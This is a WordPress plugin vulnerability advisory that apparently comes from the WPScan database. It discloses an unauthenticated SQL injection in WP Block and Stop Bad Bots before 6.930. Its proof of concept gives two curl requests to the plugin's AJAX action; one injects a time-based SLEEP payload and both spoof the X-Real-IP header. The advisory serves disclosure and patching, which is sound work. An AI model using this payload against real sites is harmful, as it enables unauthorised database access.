How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection

Proof of Concept

curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=0' -H 'X-Real-IP: 1.1.1.36'

then

curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(5))' -H 'X-Real-IP: 1.1.1.36'

Affects Plugins

Fixed in version 6.930

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

a0fbb79a-e160-49df-9cf2-18ab64ea66cb

Timeline

Publicly Published

2022-03-16 (about 3 months ago)

Added

2022-03-16 (about 3 months ago)

Last Updated

2022-04-09 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin